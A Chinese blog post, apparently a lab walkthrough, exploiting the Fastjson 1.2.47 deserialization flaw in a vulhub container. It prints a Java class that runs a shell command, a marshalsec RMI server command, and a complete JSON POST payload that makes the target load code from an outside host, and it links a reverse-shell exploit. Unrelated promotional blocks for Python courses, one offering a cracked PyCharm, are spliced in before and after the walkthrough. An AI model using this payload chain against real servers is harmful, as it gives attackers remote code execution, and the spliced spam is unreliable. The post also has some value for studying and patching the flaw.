22 - vulhub - Fastjson 1

最后

不知道你们用的什么环境,我一般都是用的Python3.6环境和pycharm解释器,没有软件,或者没有资料,没人解答问题,都可以免费领取(包括今天的代码),过几天我还会做个视频教程出来,有需要也可以领取~

给大家准备的学习资料包括但不限于:

Python 环境、pycharm编辑器/永久激活/翻译插件

python 零基础视频教程

Python 界面开发实战教程

Python 爬虫实战教程

Python 数据分析实战教程

python 游戏开发实战教程

Python 电子书100本

Python 学习路线规划

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


在这里插入图片描述


漏洞利用限制

FastJson < 1.2.48

环境准备

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.0.101 (虚拟机 Kali 2020.2 、Java1.8、Burp)

启动 fastjson 反序列化导致任意命令执行漏洞 环境

1.进入 vulhub 的 Fastjson 1.2.47 路径

cd /usr/local/tools/vulhub/fastjson/1.2.47-rce

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce


在这里插入图片描述


访问 8090 端口


在这里插入图片描述



漏洞利用

同样的需要先使用 javac 编译一个 TouchFile.class 文件

// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {“touch”, “/tmp/success”};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

或者直接利用上文中的 EXP https://github.com/CaijiOrz/fastjson-1.2.47-RCE , 该Exploit.java只是一段反弹shell的代码,需要修改为攻击机的ip和端口。[吐个槽,我反弹shell失败了,TouchFile倒是成功了]如下图:


在这里插入图片描述


在这里插入图片描述


这里我们直接使用 EXP 好了。

在该 EXP 目录下利用python模拟启动一个本地可以访问的服务器。

python -m SimpleHTTPServer 22222


在这里插入图片描述


在这里插入图片描述


同样的在当前目录启动LDAP服务,修改IP为当前这台服务器的IP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.98.192.99:22222/#TouchFile" 9999


在这里插入图片描述


至此,我们整个攻击环境已经准备好。

验证漏洞利用是否成功

利用我们的攻击环境,向靶场发送payload。

构造好的请求包发送如下,注意Content-type格式要json,并且是post请求。

POST / HTTP/1.1

Host: 139.196.87.102:8090

Accept: /

Accept-Encoding: gzip, deflate

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 268

Content-Type: application/json

{

“a”:{

“@type”:“java.lang.Class”,

“val”:“com.sun.rowset.JdbcRowSetImpl”

},

“b”:{

“@type”:“com.sun.rowset.JdbcRowSetImpl”,

“dataSourceName”:“rmi://47.98.192.99:9999/EXploit”,

“autoCommit”:true

}

}

进入容器,查看 success 文件是否创建。


在这里插入图片描述


在这里插入图片描述


在这里插入图片描述


说实话, 反弹shell真折腾人!

修复建议

在1.2.48版本的补丁中,首先黑名单做了更新,其中就包含了java.lang.class这个类,并且MiscCodec中也将传入的cache参数置为了false,这样通过payload中a部分的java.lang.class引入JdbcRowSetImpl类,b部分通过mappings获取JdbcRowSetImpl类的方法就失效了,并且1.2.48以下开不开autotype都能打。

参考资料:

现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。

分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值